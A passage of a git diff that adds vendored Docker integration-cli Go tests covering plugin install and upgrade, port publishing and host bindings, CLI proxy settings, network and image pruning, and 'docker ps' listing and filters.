checker.Contains, "true") + +} + +func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL) + // 
install locally and push to private registry + dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag) + dockerCmd(c, "plugin", "push", pluginName) + dockerCmd(c, "plugin", "rm", "-f", pluginName) + + // Try trusted install on untrusted plugin + installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName) + s.trustedCmd(installCmd) + out, _, err := runCommandWithOutput(installCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) +} + +func (s *DockerSuite) TestPluginUpgrade(c *check.C) { + testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64) + plugin := "cpuguy83/docker-volume-driver-plugin-local:latest" + pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2" + + dockerCmd(c, "plugin", "install", "--grant-all-permissions", plugin) + dockerCmd(c, "volume", "create", "--driver", plugin, "bananas") + dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "touch /apple/core") + + out, _, err := dockerCmdWithError("plugin", "upgrade", "--grant-all-permissions", plugin, pluginV2) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "disabled before upgrading") + + out, _ = dockerCmd(c, "plugin", "inspect", "--format={{.ID}}", plugin) + id := strings.TrimSpace(out) + + // make sure "v2" does not exists + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out)) + + dockerCmd(c, "plugin", "disable", "-f", plugin) + dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2) + + // make sure "v2" file exists + _, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2")) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "plugin", "enable", plugin) + dockerCmd(c, "volume", 
"inspect", "bananas") + dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go new file mode 100644 index 0000000000..80b00fe93e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go @@ -0,0 +1,319 @@ +package main + +import ( + "fmt" + "net" + "regexp" + "sort" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPortList(c *check.C) { + testRequires(c, DaemonIsLinux) + // one port + out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox", "top") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + err := assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", firstID) + + err = assertPortList(c, out, []string{"80/tcp -> 0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", firstID) + + // three port + out, _ = dockerCmd(c, "run", "-d", + "-p", "9876:80", + "-p", "9877:81", + "-p", "9878:82", + "busybox", "top") + ID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID, "80") + + err = assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9876", + "81/tcp -> 0.0.0.0:9877", + "82/tcp -> 0.0.0.0:9878"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "rm", "-f", ID) + + // more and one port mapped to the same container port + out, _ = dockerCmd(c, "run", "-d", + "-p", "9876:80", + "-p", "9999:80", + "-p", "9877:81", + "-p", "9878:82", + "busybox", "top") + ID = 
strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID, "80") + + err = assertPortList(c, out, []string{"0.0.0.0:9876", "0.0.0.0:9999"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9876", + "80/tcp -> 0.0.0.0:9999", + "81/tcp -> 0.0.0.0:9877", + "82/tcp -> 0.0.0.0:9878"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) + + testRange := func() { + // host port ranges used + IDs := make([]string, 3) + for i := 0; i < 3; i++ { + out, _ = dockerCmd(c, "run", "-d", + "-p", "9090-9092:80", + "busybox", "top") + IDs[i] = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", IDs[i]) + + err = assertPortList(c, out, []string{fmt.Sprintf("80/tcp -> 0.0.0.0:%d", 9090+i)}) + // Port list is not correct + c.Assert(err, checker.IsNil) + } + + // test port range exhaustion + out, _, err = dockerCmdWithError("run", "-d", + "-p", "9090-9092:80", + "busybox", "top") + // Exhausted port range did not return an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + for i := 0; i < 3; i++ { + dockerCmd(c, "rm", "-f", IDs[i]) + } + } + testRange() + // Verify we ran re-use port ranges after they are no longer in use. + testRange() + + // test invalid port ranges + for _, invalidRange := range []string{"9090-9089:80", "9090-:80", "-9090:80"} { + out, _, err = dockerCmdWithError("run", "-d", + "-p", invalidRange, + "busybox", "top") + // Port range should have returned an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + } + + // test host range:container range spec. 
+ out, _ = dockerCmd(c, "run", "-d", + "-p", "9800-9803:80-83", + "busybox", "top") + ID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9800", + "81/tcp -> 0.0.0.0:9801", + "82/tcp -> 0.0.0.0:9802", + "83/tcp -> 0.0.0.0:9803"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) + + // test mixing protocols in same port range + out, _ = dockerCmd(c, "run", "-d", + "-p", "8000-8080:80", + "-p", "8000-8080:80/udp", + "busybox", "top") + ID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:8000", + "80/udp -> 0.0.0.0:8000"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) +} + +func assertPortList(c *check.C, out string, expected []string) error { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + if len(lines) != len(expected) { + return fmt.Errorf("different size lists %s, %d, %d", out, len(lines), len(expected)) + } + sort.Strings(lines) + sort.Strings(expected) + + for i := 0; i < len(expected); i++ { + if lines[i] != expected[i] { + return fmt.Errorf("|" + lines[i] + "!=" + expected[i] + "|") + } + } + + return nil +} + +func stopRemoveContainer(id string, c *check.C) { + dockerCmd(c, "rm", "-f", id) +} + +func (s *DockerSuite) TestUnpublishedPortsInPsOutput(c *check.C) { + testRequires(c, DaemonIsLinux) + // Run busybox with command line expose (equivalent to EXPOSE in image's Dockerfile) for the following ports + port1 := 80 + port2 := 443 + expose1 := fmt.Sprintf("--expose=%d", port1) + expose2 := fmt.Sprintf("--expose=%d", port2) + dockerCmd(c, "run", "-d", expose1, expose2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the unpublished ports + unpPort1 := fmt.Sprintf("%d/tcp", port1) + unpPort2 := fmt.Sprintf("%d/tcp", port2) + out, _ := dockerCmd(c, "ps", "-n=1") + // 
Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort2) + + // Run the container forcing to publish the exposed ports + dockerCmd(c, "run", "-d", "-P", expose1, expose2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the exposed ports in the port bindings + expBndRegx1 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort1) + expBndRegx2 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort2) + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort1) in docker ps output + c.Assert(expBndRegx1.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort1: %s", out, unpPort1)) + // Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort2) in docker ps output + c.Assert(expBndRegx2.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort2: %s", out, unpPort2)) + + // Run the container specifying explicit port bindings for the exposed ports + offset := 10000 + pFlag1 := fmt.Sprintf("%d:%d", offset+port1, port1) + pFlag2 := fmt.Sprintf("%d:%d", offset+port2, port2) + out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, expose1, expose2, "busybox", "sleep", "5") + id := strings.TrimSpace(out) + + // Check docker ps o/p for last created container reports the specified port mappings + expBnd1 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port1, unpPort1) + expBnd2 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port2, unpPort2) + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding (expBnd1) in docker ps output + c.Assert(out, checker.Contains, expBnd1) + // Cannot find expected port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) + + // Remove container now otherwise it will interfere with next test + stopRemoveContainer(id, c) + + // Run the container with explicit port 
bindings and no exposed ports + out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, "busybox", "sleep", "5") + id = strings.TrimSpace(out) + + // Check docker ps o/p for last created container reports the specified port mappings + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding (expBnd1) in docker ps output + c.Assert(out, checker.Contains, expBnd1) + // Cannot find expected port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) + // Remove container now otherwise it will interfere with next test + stopRemoveContainer(id, c) + + // Run the container with one unpublished exposed port and one explicit port binding + dockerCmd(c, "run", "-d", expose1, "-p", pFlag2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the specified unpublished port and port mapping + out, _ = dockerCmd(c, "ps", "-n=1") + // Missing unpublished exposed ports (unpPort1) in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) +} + +func (s *DockerSuite) TestPortHostBinding(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox", + "nc", "-l", "-p", "80") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + err := assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--net=host", "busybox", + "nc", "localhost", "9876") + + dockerCmd(c, "rm", "-f", firstID) + + out, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "9876") + // Port is still bound after the Container is removed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestPortExposeHostBinding(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := 
dockerCmd(c, "run", "-d", "-P", "--expose", "80", "busybox", + "nc", "-l", "-p", "80") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + _, exposedPort, err := net.SplitHostPort(out) + c.Assert(err, checker.IsNil, check.Commentf("out: %s", out)) + + dockerCmd(c, "run", "--net=host", "busybox", + "nc", "localhost", strings.TrimSpace(exposedPort)) + + dockerCmd(c, "rm", "-f", firstID) + + out, _, err = dockerCmdWithError("run", "--net=host", "busybox", + "nc", "localhost", strings.TrimSpace(exposedPort)) + // Port is still bound after the Container is removed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestPortBindingOnSandbox(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "--internal", "-d", "bridge", "internal-net") + nr := getNetworkResource(c, "internal-net") + c.Assert(nr.Internal, checker.Equals, true) + + dockerCmd(c, "run", "--net", "internal-net", "-d", "--name", "c1", + "-p", "8080:8080", "busybox", "nc", "-l", "-p", "8080") + c.Assert(waitRun("c1"), check.IsNil) + + _, _, err := dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080") + c.Assert(err, check.NotNil, + check.Commentf("Port mapping on internal network is expected to fail")) + + // Connect container to another normal bridge network + dockerCmd(c, "network", "create", "-d", "bridge", "foo-net") + dockerCmd(c, "network", "connect", "foo-net", "c1") + + _, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080") + c.Assert(err, check.IsNil, + check.Commentf("Port mapping on the new network is expected to succeed")) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go new file mode 100644 index 0000000000..1cf569b806 --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go @@ -0,0 +1,53 @@ +package main + +import ( + "net" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://.. + + cmd := exec.Command(dockerBinary, "info") + cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999") + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + +} + +// Can't use localhost here since go has a special case to not use proxy if connecting to localhost +// See https://golang.org/pkg/net/http/#ProxyFromEnvironment +func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) { + testRequires(c, SameHostDaemon) + // get the IP to use to connect since we can't use localhost + addrs, err := net.InterfaceAddrs() + c.Assert(err, checker.IsNil) + var ip string + for _, addr := range addrs { + sAddr := addr.String() + if !strings.Contains(sAddr, "127.0.0.1") { + addrArr := strings.Split(sAddr, "/") + ip = addrArr[0] + break + } + } + + c.Assert(ip, checker.Not(checker.Equals), "") + + err = s.d.Start("-H", "tcp://"+ip+":2375") + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "info") + cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"} + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + // Test with no_proxy + cmd.Env = append(cmd.Env, "NO_PROXY="+ip) + out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info")) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go new file mode 100644 index 
0000000000..dabbc72081 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go @@ -0,0 +1,91 @@ +// +build !windows + +package main + +import ( + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) { + _, err := d.Cmd("network", "prune", "--force") + c.Assert(err, checker.IsNil) + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + for _, s := range kept { + c.Assert(out, checker.Contains, s) + } + for _, s := range pruned { + c.Assert(out, checker.Not(checker.Contains), s) + } +} + +func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + _, err := d.Cmd("network", "create", "n1") // used by container (testprune) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n2") + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n3", "--driver", "overlay") // used by service (testprunesvc) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n4", "--driver", "overlay") + c.Assert(err, checker.IsNil) + + cName := "testprune" + _, err = d.Cmd("run", "-d", "--name", cName, "--net", "n1", "busybox", "top") + c.Assert(err, checker.IsNil) + + serviceName := "testprunesvc" + replicas := 1 + out, err := d.Cmd("service", "create", "--name", serviceName, + "--replicas", strconv.Itoa(replicas), + "--network", "n3", + "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, replicas+1) + + // prune and verify + pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"}) + + // remove containers, then prune and verify again + _, err = d.Cmd("rm", "-f", cName) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("service", 
"rm", serviceName) + c.Assert(err, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"}) +} + +func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + + out, _, err := s.d.buildImageWithOut("test", + `FROM busybox + LABEL foo=bar`, true, "-q") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("image", "prune", "--force") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("image", "prune", "--force", "--all") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go new file mode 100644 index 0000000000..19ede90d5a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go @@ -0,0 +1,952 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sort" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPsListContainersBase(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + firstID := strings.TrimSpace(out) + + 
out, _ = runSleepingContainer(c, "-d") + secondID := strings.TrimSpace(out) + + // not long running + out, _ = dockerCmd(c, "run", "-d", "busybox", "true") + thirdID := strings.TrimSpace(out) + + out, _ = runSleepingContainer(c, "-d") + fourthID := strings.TrimSpace(out) + + // make sure the second is running + c.Assert(waitRun(secondID), checker.IsNil) + + // make sure third one is not running + dockerCmd(c, "wait", thirdID) + + // make sure the forth is running + c.Assert(waitRun(fourthID), checker.IsNil) + + // all + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) + + // running + out, _ = dockerCmd(c, "ps") + c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) + + // limit + out, _ = dockerCmd(c, "ps", "-n=2", "-a") + expected := []string{fourthID, thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-n=2") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter since + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a") + expected = []string{fourthID, thirdID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID) + expected = []string{fourthID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", 
"since="+thirdID) + expected = []string{fourthID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + // filter before + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a") + expected = []string{thirdID, secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID) + expected = []string{secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID) + expected = []string{secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + // filter since & before + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a") + expected = []string{thirdID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID) + expected = []string{secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) + + // filter since & limit + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a") + expected = []string{fourthID, thirdID} + + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, 
"-n=2") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter before & limit + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a") + expected = []string{thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter since & filter before & limit + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a") + expected = []string{thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + +} + +func assertContainerList(out string, expected []string) bool { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + if len(lines)-1 != len(expected) { + return false + } + + containerIDIndex := strings.Index(lines[0], "CONTAINER ID") + for i := 0; i < len(expected); i++ { + foundID := lines[i+1][containerIDIndex : containerIDIndex+12] + if foundID != expected[i][:12] { + return false + } + } + + return true +} + +// FIXME(vdemeester) Move this into a unit test in daemon package +func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) { + out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test") + c.Assert(err, checker.NotNil) + 
c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestPsListContainersSize(c *check.C) { + // Problematic on Windows as it doesn't report the size correctly @swernli + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "busybox") + + baseOut, _ := dockerCmd(c, "ps", "-s", "-n=1") + baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n") + baseSizeIndex := strings.Index(baseLines[0], "SIZE") + baseFoundsize := baseLines[1][baseSizeIndex:] + baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0]) + c.Assert(err, checker.IsNil) + + name := "test_size" + dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test") + id, err := getIDByName(name) + c.Assert(err, checker.IsNil) + + runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1") + var out string + + wait := make(chan struct{}) + go func() { + out, _, err = runCommandWithOutput(runCmd) + close(wait) + }() + select { + case <-wait: + case <-time.After(3 * time.Second): + c.Fatalf("Calling \"docker ps -s\" timed out!") + } + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.Trim(out, "\n "), "\n") + c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines))) + sizeIndex := strings.Index(lines[0], "SIZE") + idIndex := strings.Index(lines[0], "CONTAINER ID") + foundID := lines[1][idIndex : idIndex+12] + c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID)) + expectedSize := fmt.Sprintf("%d B", (2 + baseBytes)) + foundSize := lines[1][sizeIndex:] + c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize)) +} + +func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) { + // start exited container + out, _ := dockerCmd(c, "run", "-d", "busybox") + firstID := strings.TrimSpace(out) + + // make sure the exited container is not running + dockerCmd(c, "wait", firstID) 
+ + // start running container + out, _ = dockerCmd(c, "run", "-itd", "busybox") + secondID := strings.TrimSpace(out) + + // filter containers by exited + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID) + + out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, secondID) + + result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Unrecognised filter value for status", + }) + + // Windows doesn't support pausing of containers + if daemonPlatform != "windows" { + // pause running container + out, _ = dockerCmd(c, "run", "-itd", "busybox") + pausedID := strings.TrimSpace(out) + dockerCmd(c, "pause", pausedID) + // make sure the container is unpaused to let the daemon stop it properly + defer func() { dockerCmd(c, "unpause", pausedID) }() + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, pausedID) + } +} + +func (s *DockerSuite) TestPsListContainersFilterHealth(c *check.C) { + // Test legacy no health check + out, _ := runSleepingContainer(c, "--name=none_legacy") + containerID := strings.TrimSpace(out) + + waitForContainer(containerID) + + out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out)) + + // Test no health check specified explicitly + out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck") + containerID = strings.TrimSpace(out) + + waitForContainer(containerID) + + out, _ = dockerCmd(c, "ps", 
"-q", "-l", "--no-trunc", "--filter=health=none") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out)) + + // Test failing health check + out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") + containerID = strings.TrimSpace(out) + + waitForHealthStatus(c, "failing_container", "starting", "unhealthy") + + out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out)) + + // Check passing healthcheck + out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") + containerID = strings.TrimSpace(out) + + waitForHealthStatus(c, "passing_container", "starting", "healthy") + + out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out)) +} + +func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) { + // start container + out, _ := dockerCmd(c, "run", "-d", "busybox") + firstID := strings.TrimSpace(out) + + // start another container + runSleepingContainer(c) + + // filter containers by id + out, _ = dockerCmd(c, "ps", "-a", "-q", "--filter=id="+firstID) + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, 